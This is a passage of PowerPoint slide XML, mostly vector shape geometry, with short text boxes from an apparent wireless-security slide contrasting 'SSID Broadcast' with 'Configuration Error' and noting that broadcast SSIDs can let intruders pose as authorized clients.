                  <a:pt x="484" y="967"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="212" y="967"/>
                  <a:pt x="0" y="746"/>
                  <a:pt x="0" y="483"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="221"/>
                  <a:pt x="212" y="0"/>
                  <a:pt x="484" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="746" y="0"/>
                  <a:pt x="958" y="221"/>
                  <a:pt x="958" y="483"/>
                </a:cubicBezTo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217"/>
            <a:endParaRPr lang="en-US" sz="2480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" name="Freeform 165">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C8C8408-CF85-42B8-899F-9654CDFA08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9066" y="4800600"/>
            <a:ext cx="2684254" cy="1600200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1665 w 1666"/>
              <a:gd name="T1" fmla="*/ 3493 h 3494"/>
              <a:gd name="T2" fmla="*/ 0 w 1666"/>
              <a:gd name="T3" fmla="*/ 3493 h 3494"/>
              <a:gd name="T4" fmla="*/ 0 w 1666"/>
              <a:gd name="T5" fmla="*/ 0 h 3494"/>
              <a:gd name="T6" fmla="*/ 1665 w 1666"/>
              <a:gd name="T7" fmla="*/ 0 h 3494"/>
              <a:gd name="T8" fmla="*/ 1665 w 1666"/>
              <a:gd name="T9" fmla="*/ 3493 h 34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66" h="3494">
                <a:moveTo>
                  <a:pt x="1665" y="3493"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="3493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1665" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1665" y="3493"/>
                </a:ln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217"/>
            <a:endParaRPr lang="en-US" sz="830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" name="Freeform 171">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E35F2148-B23D-4309-B98C-4D3E072808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9066" y="4387805"/>
            <a:ext cx="2684255" cy="423933"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1665 w 1666"/>
              <a:gd name="T1" fmla="*/ 0 h 502"/>
              <a:gd name="T2" fmla="*/ 0 w 1666"/>
              <a:gd name="T3" fmla="*/ 0 h 502"/>
              <a:gd name="T4" fmla="*/ 0 w 1666"/>
              <a:gd name="T5" fmla="*/ 501 h 502"/>
              <a:gd name="T6" fmla="*/ 1665 w 1666"/>
              <a:gd name="T7" fmla="*/ 501 h 502"/>
              <a:gd name="T8" fmla="*/ 1665 w 1666"/>
              <a:gd name="T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66" h="502">
                <a:moveTo>
                  <a:pt x="1665" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1665" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1665" y="0"/>
                </a:lnTo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217"/>
            <a:endParaRPr lang="en-US" sz="830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1CFFEE8-D7B5-4776-A797-5AB1963CA3C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6923035" y="4819956"/>
            <a:ext cx="2399329" cy="1588109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="109710" tIns="54855" rIns="109710" bIns="54855" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSID broadcasting is a configuration error that enables intruders to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>steal an SSID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and cause the AP assume they are allowed to connect</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Box 250">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC3C2B2C-3536-4A6E-A54D-E9FFBEB51F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5653" y="4466646"/>
            <a:ext cx="2051081" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1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1pPr>
            <a:lvl2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2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
            <a:lvl6pPr marL="25146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6pPr>
            <a:lvl7pPr marL="29718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7pPr>
            <a:lvl8pPr marL="34290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8pPr>
            <a:lvl9pPr marL="38862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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914217">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="228600" algn="l"/>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="685800" algn="l"/>
                <a:tab pos="914400" algn="l"/>
                <a:tab pos="1143000" algn="l"/>
                <a:tab pos="1371600" algn="l"/>
                <a:tab pos="1600200" algn="l"/>
                <a:tab pos="1828800" algn="l"/>
                <a:tab pos="2057400" algn="l"/>
                <a:tab pos="2286000" algn="l"/>
                <a:tab pos="2514600" algn="l"/>
                <a:tab pos="2743200" algn="l"/>
                <a:tab pos="2971800" algn="l"/>
                <a:tab pos="3200400" algn="l"/>
                <a:tab pos="3429000" algn="l"/>
                <a:tab pos="3657600" algn="l"/>
                <a:tab pos="3886200" algn="l"/>
                <a:tab pos="4114800" algn="l"/>
                <a:tab pos="4343400" algn="l"/>
                <a:tab pos="4572000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:cs typeface="Lato Regular"/>
              </a:rPr>
              <a:t>Configuration Error</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Freeform 2244">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{787DBC99-1EAC-48AA-B28F-38F7D4508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1760" y="3876808"/>
            <a:ext cx="1020947" cy="1035191"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 958 w 959"/>
              <a:gd name="T1" fmla="*/ 483 h 968"/>
              <a:gd name="T2" fmla="*/ 958 w 959"/>
              <a:gd name="T3" fmla="*/ 483 h 968"/>
              <a:gd name="T4" fmla="*/ 484 w 959"/>
              <a:gd name="T5" fmla="*/ 967 h 968"/>
              <a:gd name="T6" fmla="*/ 0 w 959"/>
              <a:gd name="T7" fmla="*/ 483 h 968"/>
              <a:gd name="T8" fmla="*/ 484 w 959"/>
              <a:gd name="T9" fmla="*/ 0 h 968"/>
              <a:gd name="T10" fmla="*/ 958 w 959"/>
              <a:gd name="T11" fmla="*/ 483 h 9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59" h="968">
                <a:moveTo>
                  <a:pt x="958" y="483"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="958" y="483"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="958" y="746"/>
                  <a:pt x="746" y="967"/>
                  <a:pt x="484" y="967"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="212" y="967"/>
                  <a:pt x="0" y="746"/>
                  <a:pt x="0" y="483"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="221"/>
                  <a:pt x="212" y="0"/>
                  <a:pt x="484" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="746" y="0"/>
                  <a:pt x="958" y="221"/>
                  <a:pt x="958" y="483"/>
                </a:cubicBezTo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217"/>
            <a:endParaRPr lang="en-US" sz="2480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4" name="Freeform 165">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB519AFC-5B55-4134-BED1-DA0430DA62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4800600"/>
            <a:ext cx="2684254" cy="1600200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1665 w 1666"/>
              <a:gd name="T1" fmla="*/ 3493 h 3494"/>
              <a:gd name="T2" fmla="*/ 0 w 1666"/>
              <a:gd name="T3" fmla="*/ 3493 h 3494"/>
              <a:gd name="T4" fmla="*/ 0 w 1666"/>
              <a:gd name="T5" fmla="*/ 0 h 3494"/>
              <a:gd name="T6" fmla="*/ 1665 w 1666"/>
              <a:gd name="T7" fmla="*/ 0 h 3494"/>
              <a:gd name="T8" fmla="*/ 1665 w 1666"/>
              <a:gd name="T9" fmla="*/ 3493 h 34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66" h="3494">
                <a:moveTo>
                  <a:pt x="1665" y="3493"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="3493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1665" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1665" y="3493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pPr defTabSz="914217"/>
            <a:endParaRPr lang="en-US" sz="830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5" name="Freeform 171">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98E08E4A-8550-4F64-B461-53CDF72128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4387805"/>
            <a:ext cx="2684255" cy="423933"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1665 w 1666"/>
              <a:gd name="T1" fmla="*/ 0 h 502"/>
              <a:gd name="T2" fmla="*/ 0 w 1666"/>
              <a:gd name="T3" fmla="*/ 0 h 502"/>
              <a:gd name="T4" fmla="*/ 0 w 1666"/>
              <a:gd name="T5" fmla="*/ 501 h 502"/>
              <a:gd name="T6" fmla="*/ 1665 w 1666"/>
              <a:gd name="T7" fmla="*/ 501 h 502"/>
              <a:gd name="T8" fmla="*/ 1665 w 1666"/>
              <a:gd name="T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66" h="502">
                <a:moveTo>
                  <a:pt x="1665" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1665" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1665" y="0"/>
                </a:lnTo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217"/>
            <a:endParaRPr lang="en-US" sz="830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C0AD073-DEB2-4E52-8C6D-D8BEEF1866BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="372569" y="4819956"/>
            <a:ext cx="2399329" cy="849445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="109710" tIns="54855" rIns="109710" bIns="54855" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>APs are configured to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>broadcast SSIDs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to authorized users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Box 250">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6DE771B-4A55-4F23-85C4-630739F487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4394" y="4466646"/>
            <a:ext cx="1535678" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1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1pPr>
            <a:lvl2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2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
            <a:lvl6pPr marL="25146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6pPr>
            <a:lvl7pPr marL="29718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7pPr>
            <a:lvl8pPr marL="34290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8pPr>
            <a:lvl9pPr marL="38862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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914217">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="228600" algn="l"/>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="685800" algn="l"/>
                <a:tab pos="914400" algn="l"/>
                <a:tab pos="1143000" algn="l"/>
                <a:tab pos="1371600" algn="l"/>
                <a:tab pos="1600200" algn="l"/>
                <a:tab pos="1828800" algn="l"/>
                <a:tab pos="2057400" algn="l"/>
                <a:tab pos="2286000" algn="l"/>
                <a:tab pos="2514600" algn="l"/>
                <a:tab pos="2743200" algn="l"/>
                <a:tab pos="2971800" algn="l"/>
                <a:tab pos="3200400" algn="l"/>
                <a:tab pos="3429000" algn="l"/>
                <a:tab pos="3657600" algn="l"/>
                <a:tab pos="3886200" algn="l"/>
                <a:tab pos="4114800" algn="l"/>
                <a:tab pos="4343400" algn="l"/>
                <a:tab pos="4572000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:cs typeface="Lato Regular"/>
              </a:rPr>
              <a:t>SSID Broadcast</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Freeform 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FBAACAF-1AEB-4295-B079-D6958359C22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069766" y="5172491"/>
            <a:ext cx="310896" cy="692787"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 739 w 740"/>
              <a:gd name="T1" fmla="*/ 1662 h 1663"/>
              <a:gd name="T2" fmla="*/ 0 w 740"/>
              <a:gd name="T3" fmla="*/ 830 h 1663"/>
              <a:gd name="T4" fmla="*/ 739 w 740"/>
              <a:gd name="T5" fmla="*/ 0 h 1663"/>
              <a:gd name="T6" fmla="*/ 739 w 740"/>
              <a:gd name="T7" fmla="*/ 1662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63">
                <a:moveTo>
                  <a:pt x="739" y="1662"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="739" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="739" y="1662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pPr defTabSz="914217"/>
            <a:endParaRPr lang="en-US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9" name="Freeform 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68DD678D-176C-460F-B18F-A432B6BE44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93924" y="3987388"/>
            <a:ext cx="347312" cy="347402"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 399 w 444"/>
              <a:gd name="T1" fmla="*/ 53 h 444"/>
              <a:gd name="T2" fmla="*/ 399 w 444"/>
              <a:gd name="T3" fmla="*/ 53 h 444"/>
              <a:gd name="T4" fmla="*/ 372 w 444"/>
              <a:gd name="T5" fmla="*/ 53 h 444"/>
              <a:gd name="T6" fmla="*/ 372 w 444"/>
              <a:gd name="T7" fmla="*/ 98 h 444"/>
              <a:gd name="T8" fmla="*/ 293 w 444"/>
              <a:gd name="T9" fmla="*/ 98 h 444"/>
              <a:gd name="T10" fmla="*/ 293 w 444"/>
              <a:gd name="T11" fmla="*/ 53 h 444"/>
              <a:gd name="T12" fmla="*/ 151 w 444"/>
              <a:gd name="T13" fmla="*/ 53 h 444"/>
              <a:gd name="T14" fmla="*/ 151 w 444"/>
              <a:gd name="T15" fmla="*/ 98 h 444"/>
              <a:gd name="T16" fmla="*/ 71 w 444"/>
              <a:gd name="T17" fmla="*/ 98 h 444"/>
              <a:gd name="T18" fmla="*/ 71 w 444"/>
              <a:gd name="T19" fmla="*/ 53 h 444"/>
              <a:gd name="T20" fmla="*/ 45 w 444"/>
              <a:gd name="T21" fmla="*/ 53 h 444"/>
              <a:gd name="T22" fmla="*/ 0 w 444"/>
              <a:gd name="T23" fmla="*/ 98 h 444"/>
              <a:gd name="T24" fmla="*/ 0 w 444"/>
              <a:gd name="T25" fmla="*/ 399 h 444"/>
              <a:gd name="T26" fmla="*/ 45 w 444"/>
              <a:gd name="T27" fmla="*/ 443 h 444"/>
              <a:gd name="T28" fmla="*/ 399 w 444"/>
              <a:gd name="T29" fmla="*/ 443 h 444"/>
              <a:gd name="T30" fmla="*/ 443 w 444"/>
              <a:gd name="T31" fmla="*/ 399 h 444"/>
              <a:gd name="T32" fmla="*/ 443 w 444"/>
              <a:gd name="T33" fmla="*/ 98 h 444"/>
              <a:gd name="T34" fmla="*/ 399 w 444"/>
              <a:gd name="T35" fmla="*/ 53 h 444"/>
              <a:gd name="T36" fmla="*/ 399 w 444"/>
              <a:gd name="T37" fmla="*/ 399 h 444"/>
              <a:gd name="T38" fmla="*/ 399 w 444"/>
              <a:gd name="T39" fmla="*/ 399 h 444"/>
              <a:gd name="T40" fmla="*/ 45 w 444"/>
              <a:gd name="T41" fmla="*/ 399 h 444"/>
              <a:gd name="T42" fmla="*/ 45 w 444"/>
              <a:gd name="T43" fmla="*/ 196 h 444"/>
              <a:gd name="T44" fmla="*/ 399 w 444"/>
              <a:gd name="T45" fmla="*/ 196 h 444"/>
              <a:gd name="T46" fmla="*/ 399 w 444"/>
              <a:gd name="T47" fmla="*/ 399 h 444"/>
              <a:gd name="T48" fmla="*/ 124 w 444"/>
              <a:gd name="T49" fmla="*/ 0 h 444"/>
              <a:gd name="T50" fmla="*/ 124 w 444"/>
              <a:gd name="T51" fmla="*/ 0 h 444"/>
              <a:gd name="T52" fmla="*/ 89 w 444"/>
              <a:gd name="T53" fmla="*/ 0 h 444"/>
              <a:gd name="T54" fmla="*/ 89 w 444"/>
              <a:gd name="T55" fmla="*/ 89 h 444"/>
              <a:gd name="T56" fmla="*/ 124 w 444"/>
              <a:gd name="T57" fmla="*/ 89 h 444"/>
              <a:gd name="T58" fmla="*/ 124 w 444"/>
              <a:gd name="T59" fmla="*/ 0 h 444"/>
              <a:gd name="T60" fmla="*/ 354 w 444"/>
              <a:gd name="T61" fmla="*/ 0 h 444"/>
              <a:gd name="T62" fmla="*/ 354 w 444"/>
              <a:gd name="T63" fmla="*/ 0 h 444"/>
              <a:gd name="T64" fmla="*/ 319 w 444"/>
              <a:gd name="T65" fmla="*/ 0 h 444"/>
              <a:gd name="T66" fmla="*/ 319 w 444"/>
              <a:gd name="T67" fmla="*/ 89 h 444"/>
              <a:gd name="T68" fmla="*/ 354 w 444"/>
              <a:gd name="T69" fmla="*/ 89 h 444"/>
              <a:gd name="T70" fmla="*/ 354 w 444"/>
              <a:gd name="T71" fmla="*/ 0 h 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44" h="444">
                <a:moveTo>
                  <a:pt x="399" y="53"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="399" y="53"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="372" y="53"/>
                  <a:pt x="372" y="53"/>
                  <a:pt x="372" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="372" y="98"/>
                  <a:pt x="372" y="98"/>
                  <a:pt x="372" y="98"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="293" y="98"/>
                  <a:pt x="293" y="98"/>
                  <a:pt x="293" y="98"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="293" y="53"/>
                  <a:pt x="293" y="53"/>
                  <a:pt x="293" y="53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151" y="98"/>
                  <a:pt x="151" y="98"/>
                  <a:pt x="151" y="98"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="98"/>
                  <a:pt x="71" y="98"/>
                  <a:pt x="71" y="98"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="53"/>
                  <a:pt x="71" y="53"/>
                  <a:pt x="71" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="53"/>
                  <a:pt x="45" y="53"/>
                  <a:pt x="45" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18" y="53"/>
                  <a:pt x="0" y="71"/>
                  <a:pt x="0" y="98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5"/>
                  <a:pt x="18" y="443"/>
                  <a:pt x="45" y="443"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399" y="443"/>
                  <a:pt x="399" y="443"/>
                  <a:pt x="399" y="443"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="425" y="443"/>
                  <a:pt x="443" y="425"/>
                  <a:pt x="443" y="399"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="443" y="98"/>
                  <a:pt x="443" y="98"/>
                  <a:pt x="443" y="98"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="443" y="71"/>
                  <a:pt x="425" y="53"/>
                  <a:pt x="399" y="53"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="399" y="399"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="399" y="399"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="399"/>
                  <a:pt x="45" y="399"/>
                  <a:pt x="45" y="399"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="196"/>
                  <a:pt x="45" y="196"/>
                  <a:pt x="45" y="196"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399" y="196"/>
                  <a:pt x="399" y="196"/>
                  <a:pt x="399" y="196"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="399" y="399"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="124" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="124" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="0"/>
                  <a:pt x="89" y="0"/>
                  <a:pt x="89" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="89"/>
                  <a:pt x="89" y="89"/>
                  <a:pt x="89" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="89"/>
                  <a:pt x="124" y="89"/>
                  <a:pt x="124" y="89"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="124" y="0"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="354" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="354" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="319" y="0"/>
                  <a:pt x="319" y="0"/>
                  <a:pt x="319" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="319" y="89"/>
                  <a:pt x="319" y="89"/>
                  <a:pt x="319" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="354" y="89"/>
                  <a:pt x="354" y="89"/>
                  <a:pt x="354" y="89"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35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lIns="45712" tIns="22856" rIns="45712" bIns="22856" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US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1" name="Freeform 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C9163E2-4EED-40C8-BC48-99216F67B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7143" y="4018123"/>
            <a:ext cx="385902" cy="347402"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 80 w 498"/>
              <a:gd name="T1" fmla="*/ 151 h 445"/>
              <a:gd name="T2" fmla="*/ 80 w 498"/>
              <a:gd name="T3" fmla="*/ 151 h 445"/>
              <a:gd name="T4" fmla="*/ 142 w 498"/>
              <a:gd name="T5" fmla="*/ 169 h 445"/>
              <a:gd name="T6" fmla="*/ 151 w 498"/>
              <a:gd name="T7" fmla="*/ 169 h 445"/>
              <a:gd name="T8" fmla="*/ 195 w 498"/>
              <a:gd name="T9" fmla="*/ 134 h 445"/>
              <a:gd name="T10" fmla="*/ 195 w 498"/>
              <a:gd name="T11" fmla="*/ 125 h 445"/>
              <a:gd name="T12" fmla="*/ 178 w 498"/>
              <a:gd name="T13" fmla="*/ 107 h 445"/>
              <a:gd name="T14" fmla="*/ 275 w 498"/>
              <a:gd name="T15" fmla="*/ 10 h 445"/>
              <a:gd name="T16" fmla="*/ 195 w 498"/>
              <a:gd name="T17" fmla="*/ 0 h 445"/>
              <a:gd name="T18" fmla="*/ 107 w 498"/>
              <a:gd name="T19" fmla="*/ 54 h 445"/>
              <a:gd name="T20" fmla="*/ 72 w 498"/>
              <a:gd name="T21" fmla="*/ 81 h 445"/>
              <a:gd name="T22" fmla="*/ 53 w 498"/>
              <a:gd name="T23" fmla="*/ 116 h 445"/>
              <a:gd name="T24" fmla="*/ 18 w 498"/>
              <a:gd name="T25" fmla="*/ 125 h 445"/>
              <a:gd name="T26" fmla="*/ 0 w 498"/>
              <a:gd name="T27" fmla="*/ 143 h 445"/>
              <a:gd name="T28" fmla="*/ 0 w 498"/>
              <a:gd name="T29" fmla="*/ 151 h 445"/>
              <a:gd name="T30" fmla="*/ 36 w 498"/>
              <a:gd name="T31" fmla="*/ 187 h 445"/>
              <a:gd name="T32" fmla="*/ 53 w 498"/>
              <a:gd name="T33" fmla="*/ 196 h 445"/>
              <a:gd name="T34" fmla="*/ 72 w 498"/>
              <a:gd name="T35" fmla="*/ 178 h 445"/>
              <a:gd name="T36" fmla="*/ 80 w 498"/>
              <a:gd name="T37" fmla="*/ 151 h 445"/>
              <a:gd name="T38" fmla="*/ 222 w 498"/>
              <a:gd name="T39" fmla="*/ 160 h 445"/>
              <a:gd name="T40" fmla="*/ 222 w 498"/>
              <a:gd name="T41" fmla="*/ 160 h 445"/>
              <a:gd name="T42" fmla="*/ 213 w 498"/>
              <a:gd name="T43" fmla="*/ 160 h 445"/>
              <a:gd name="T44" fmla="*/ 178 w 498"/>
              <a:gd name="T45" fmla="*/ 187 h 445"/>
              <a:gd name="T46" fmla="*/ 169 w 498"/>
              <a:gd name="T47" fmla="*/ 204 h 445"/>
              <a:gd name="T48" fmla="*/ 381 w 498"/>
              <a:gd name="T49" fmla="*/ 435 h 445"/>
              <a:gd name="T50" fmla="*/ 399 w 498"/>
